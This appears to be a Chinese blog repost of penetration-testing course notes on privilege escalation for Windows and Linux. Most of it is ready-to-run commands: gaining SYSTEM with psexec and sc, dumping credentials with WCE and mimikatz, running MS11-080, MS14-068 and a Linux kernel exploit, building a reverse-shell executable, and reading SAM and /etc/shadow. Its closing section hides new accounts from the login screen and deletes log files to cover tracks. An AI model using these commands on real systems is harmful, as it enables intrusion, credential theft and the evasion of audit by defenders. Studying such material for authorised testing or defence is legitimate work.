zoukankan      html  css  js  c++  java
  • 第十章 提权

    本地提权  

    • 已实现本地低权限账号登录
    • 远程溢出
    • 直接获得账号密码
    • 希望获取更高权限
    • 实现对目标进一步控制
    • 系统账号之间权限隔离
    • 操作系统安全的基础
    • 用户空间
    • 内核空间
    • 系统账号
    • 用户账号登陆时获取权限令牌
    • 服务账号无需用户登陆已在后台启动服务 
    

    Windows

    • user
    • Administrator
    • System 
    

    Linux

    • User
    • Root 
    

     ADMIN提权为SYSTEM  

    • Windows system账号
      • 系统设置管理功能
      • SysInternal Suite
      • https://technet.microsoft.com/en-us/sysinternals/bb545027
      • psexec -i -s -d taskmgr
      • at 19:39 /interactive cmd 
      • sc Create syscmd binPath= "cmd /K start" type= own type= interact
      • sc start syscmd 

    服务开机自启动

    sc \IP config tlntsvr start= auto 
    注意:auto前面有一个空格
    启动Telnet服务
    sc \IP start tlntsvr
    

    注入进程提权  

      • 隐蔽痕迹
      • pinjector.exe
      • http://www.tarasco.org/security/Process_Injector/ 
    

    抓包嗅探  
    • Windows

      • Wireshark
      • Omnipeek
      • commview
      • Sniffpass 
    

    • Linux

      • Tcpdump
      • Wireshark
      • Dsniff 
    

    键盘记录 

      • Keylogger
      • 木马窃取 
    

    本地缓存密码  

      • 浏览器缓存的密码
      • IE浏览器
      • Firefox
      • 网络密码
      • 无线密码
      • http://www.nirsoft.net 

    • Dump SAM

      • Pwdump
      • /usr/share/windows-binaries/fgdump/ 
    

    WINDOWS身份认证过程


     
     WCE (WINDOWS CREDENTIAL EDITOR)

    • /usr/share/wce/
    • 需要管理员权限
    • wce-universal.exe -l  / -lv
    • wce-universal.exe -d
    • wce-universal.exe -e / -r
    • wce-universal.exe -g
    • wce-universal.exe -w   //直接明文显示密码
    • LM/NT hash 
    


     • 从内存读取LM / NTLM hash

    • Digest Authentication Package

    • NTLM Security Package

    • Kerberos Security Package

    其他工具

    • pwdump localhost
    • fgdump
    • mimikatz
      • privilege::debug #提升权限
      • sekurlsa::logonPasswords
      • :: 
    

     利用漏洞提权
    • Ms11-080

    • Kb2592799
      • https://technet.microsoft.com/library/security/ms11-080      //该站点为Wdindows的MS发布漏洞库
    • Pyinstaller                                  //pyinstaller和pywin32是将python程序转换成exe可执行程序的软件
      • https://pypi.python.org/pypi/PyInstaller/2.1
      • python pyinstaller --onefile ms11-080.py
    • Pywin32
      • http://sourceforge.net/projects/pywin32/files/pywin32/Build%20219/
    • MS11-046 
      • DoS 
    

    • Ms14-068(Windows7域环境下,普通域用户提升为域管理员用户)

    • 库
      • https://github.com/bidord/pykek                
    • ms14-068.py -u user@lab.com -s userSID -d dc.lab.com      //生成票据文件
    • 拷贝 TGT_user1@lab.com.ccache 到windows系统
    • 本地管理员登陆
      • mimikatz.exe log "kerberos::ptc TGT_user@lab.com.ccache" exit 
    

     利用漏洞提权

    • Ubuntu11.10 
        • http://old-releases.ubuntu.com/releases/11.10/ 
    • gcc 
        • sudo apt-cdrom add && sudo apt-get install gcc   //有的旧版本的Ubuntu如果无法从网络获取更新源安装gcc,可以通过iso文件的方式更新
        • gcc 18411.c -o exp         //18411.c为kali里面search出来的一个针对该漏洞的c语言写的程序
    • CVE-2012-0056 
        • /proc/pid/mem  
        • kernels >=2.6.39  
        • http://blog.zx2c4.com/749     //详解 CVE-2012-0056
    

     利用配置不当提权

    • 与漏洞提权相比 更常用的方法 
        • 企业环境 
        • 补丁更新的全部已经安装 
        • 输入变量过滤之外更值得研发关注的安全隐患 
        • 以system权限启动 
        • NTFS权限允许users修改删除 
    

     利用配置不当提权

    Windows查看所有用户权限
    • icacls • icacls c:windows*.exe /save perm /T     // /T参数代表递归查找,不仅仅只查找c:windows目录 • i586-mingw32msvc-gcc -o admin.exe admin.c     //查找之后通过kali执行此命令生成windows上的反弹.exe的可执行shell需要提前安装(apt-get install mingw32 mingw32-binutils mingw32-runtime)
    Linux查看根目录下权限为777的文件全部列出来 • Find • find / -perm 777 -exec ls -l {} ;

      利用配置不当提权

    • 应用系统的配置文件 
        • 应用连接数据库的配置文件 
    

     基本信息收集

    • Linux 
        • /etc/resolv.conf 
        • /etc/passwd  
        • /etc/shadow 
        • whoami and who –a 
        • ifconfig -a, iptables -L -n, ifconfig –a, netstat –r 
        • uname –a, ps aux 
        • dpkg -l| head 

    • Windows • ipconfig /all , ipconfig /displaydns, netstat -bnao , netstat –r • net view , net view /domain • net user /domain, net user %username% /domain • net accounts, net share • net localgroup administrators username /add • net group "Domain Controllers" /domain • net share name$=C: /unlimited • net user username /active:yes /domain

     WMIC(WINDOWS MANAGEMENT INSTRUMENTATION)

    • wmic nicconfig get ipaddress,macaddress     //获取本地的网卡的IPV4地址,IPV6地址以及对应的mac地址
    • wmic computersystem get username         //获取当前登录用户
    • wmic netlogin get name,lastlogon         //获取最后一次登录用户
    • wmic process get caption, executablepath,commandline     //获取系统当前执行的进程,以及进程所在的路径和命令行
    • wmic process where name=“cmd.exe" call terminate       //杀掉 cmd.exe
    • wmic os get name,servicepackmajorversion       //获取当前操作系统的版本
    • wmic product get name,version             //获取当前系统一些程序的版本,如python,c++,go,VMware,xshell等等
    • wmic product where name=“name” call uninstall /nointeractive   //卸载某个程序
    • wmic share get /ALL       //获取共享相关信息
    • wmic /node:"machinename" path Win32_TerminalServiceSetting where AllowTSConnections="0" call SetAllowTSConnections "1“     //命令行开启远程桌面(Windows10不适用)
    • wmic nteventlog get path,filename, writeable   //查看系统可写的日志文件系统
    

     收集敏感数据

    • 商业信息 
    • 系统信息 
    • Linux 
        • /etc  ;/usr/local/etc 
        • /etc/password  ;/etc/shadow 
        • .ssh  ;.gnupg  公私钥 
        • The e-mail and data files 
        • 业务数据库  ;身份认证服务器数据库 
        • /tmp 
    • windows
      • SAM 数据库  ; 注册表文件
      • %SYSTEMROOT% epairSAM
      • %SYSTEMROOT%System32configRegBackSAM
      • 业务数据库 ; 身份认证数据库
      • 临时文件目录
      • UserProfileAppDataLocalMicrosoftWindowsTemporary Internet Files

     隐藏痕迹

    • 禁止在登陆界面显示新建账号 
    • REG ADD "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinLogonSpecialAccountsUserList" /v uname /T REG_DWORD /D 0 
    • del %WINDIR%*.log /a/s/q/f 
    • History   
    • 日志 
        • auth.log / secure 
        • btmp / wtmp 
        • lastlog / faillog 
    • 其他日志和 HIDS 等 
    
  • 相关阅读:
    信息与网络安全需要大数据安全分析
    启明星辰:安全管理平台(SOC)
    苦练SOC“基本功”启明星辰九年磨一剑
    SpringMVC项目中web.xml中的节点载入顺序问题
    HDU2550 百步穿杨
    Android:Activity+Fragment及它们之间的数据交换(一)
    JAVA实现EXCEL公式专题(四)——字符串函数
    nginx phase handler的原理和选择
    TRIZ系列-创新原理-20-有效作用的连续性原理
    CSS实现鼠标放图片上显示白色边框+文字描写叙述
  • 原文地址:https://www.cnblogs.com/steven9898/p/11418889.html
Copyright © 2011-2022 走看看